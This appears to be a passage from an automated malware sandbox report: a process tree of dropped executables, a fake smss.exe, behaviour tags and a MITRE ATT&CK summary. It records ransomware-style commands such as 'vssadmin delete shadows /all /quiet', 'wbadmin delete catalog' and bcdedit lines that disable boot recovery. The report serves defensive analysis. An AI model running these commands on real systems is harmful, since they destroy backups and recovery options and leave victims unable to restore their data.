C:\Users\Admin\Documents\U0zKDM0y1pVnqxjsOi3SDxEd.exe"C:\Users\Admin\Documents\U0zKDM0y1pVnqxjsOi3SDxEd.exe"2⤵
- Executes dropped EXE
PID:1520
-
-
C:\Users\Admin\Documents\Hj5Kn3mRnEpDSSdr268Dcs8R.exe"C:\Users\Admin\Documents\Hj5Kn3mRnEpDSSdr268Dcs8R.exe"2⤵
- Executes dropped EXE
PID:4988
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:2736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3928 -ip 39281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1388 -ip 13881⤵PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2108 -ip 21081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 340 -ip 3401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 668 -ip 6681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4604
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:5960
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1612 -ip 16121⤵PID:6128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5960 -ip 59601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2544 -ip 25441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 132 -ip 1321⤵PID:5548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4064 -ip 40641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 5808 -ip 58081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4968 -ip 49681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3052 -ip 30521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:5448
-
C:\Users\Admin\AppData\Local\Temp\6CFE.exeC:\Users\Admin\AppData\Local\Temp\6CFE.exe1⤵
- Suspicious use of SetWindowsHookEx
PID:7040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2368 -ip 23681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4428
-
C:\Users\Admin\AppData\Local\Temp\B207.exeC:\Users\Admin\AppData\Local\Temp\B207.exe1⤵PID:3992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3360 -ip 33601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7164
-
C:\Users\Admin\AppData\Local\Temp\47DF.exeC:\Users\Admin\AppData\Local\Temp\47DF.exe1⤵PID:6400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\9C79.exeC:\Users\Admin\AppData\Local\Temp\9C79.exe1⤵PID:72
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 72 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7768
-
-
C:\Users\Admin\AppData\Local\Temp\4E8.exeC:\Users\Admin\AppData\Local\Temp\4E8.exe1⤵PID:4768
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start2⤵PID:8032
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 03⤵
- Drops file in Program Files directory
PID:7780
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:3556
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:3316
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:6200
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:5812
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:5416
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7464
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:936
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:1536
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:10592
-
-
-
C:\Users\Admin\AppData\Local\Temp\4E8.exe"C:\Users\Admin\AppData\Local\Temp\4E8.exe" -agent 02⤵PID:7480
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat2⤵PID:5860
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵PID:2960
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:5668
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵PID:5620
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete2⤵
- Blocklisted process makes network request
PID:7196 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵PID:7348
-
-
-
C:\Users\Admin\AppData\Local\Temp\75A.exeC:\Users\Admin\AppData\Local\Temp\75A.exe1⤵PID:7024
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"2⤵PID:7196
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4240
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6328 -ip 63281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5688
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4240 -ip 42401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:244
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1140
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5308
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3872 -ip 38721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7404
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3992 -ip 39921⤵PID:7464
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7800
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6400 -ip 64001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 8052 -ip 80521⤵PID:6892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 72 -ip 721⤵PID:5216
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2392
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 416 -p 2264 -ip 22642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6948 -ip 69482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3912 -ip 39122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1604 -ip 16042⤵PID:5484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5764 -ip 57642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7556 -ip 75562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6884 -ip 68842⤵PID:9324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10228 -ip 102282⤵PID:8228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10524 -ip 105242⤵PID:10960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5768 -ip 57682⤵PID:11068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10212 -ip 102122⤵PID:9744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 13300 -ip 133002⤵PID:12224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10584 -ip 105842⤵PID:7724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10680 -ip 106802⤵PID:7908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8736 -ip 87362⤵PID:6860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4136 -ip 41362⤵PID:8488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 8024 -ip 80242⤵PID:2448
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3944 -ip 39441⤵PID:7564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3896 -ip 38961⤵PID:8760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2136 -ip 21361⤵PID:3796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6608 -ip 66081⤵PID:11596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 12392 -ip 123921⤵PID:10172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 12460 -ip 124601⤵PID:11000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3840 -ip 38401⤵PID:7208
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5File Deletion
1Impair Defenses
1Modify Registry
7Virtualization/Sandbox Evasion
1Web Service
1